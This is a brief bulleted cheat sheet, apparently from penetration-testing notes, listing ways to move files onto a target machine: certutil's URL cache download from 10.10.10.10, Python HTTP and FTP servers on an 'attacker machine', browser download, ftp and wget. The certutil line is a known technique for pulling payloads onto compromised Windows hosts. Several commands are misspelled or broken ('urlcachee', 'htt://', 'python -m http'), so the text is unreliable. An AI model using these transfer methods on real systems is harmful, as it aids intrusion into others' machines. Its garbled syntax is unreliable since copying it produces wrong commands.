• certutil
    • certutil.exe-urlcachee-f htt://10.10.10.10/file.txt
  • HTTP
    • python -m http 8080
  • Browser
    • navigate direcrtly to file
  • FTP
    • python -m pyftpdlib 21 {attacker machine}
    • ftp 10.10.10.10
  • Linux
    • wget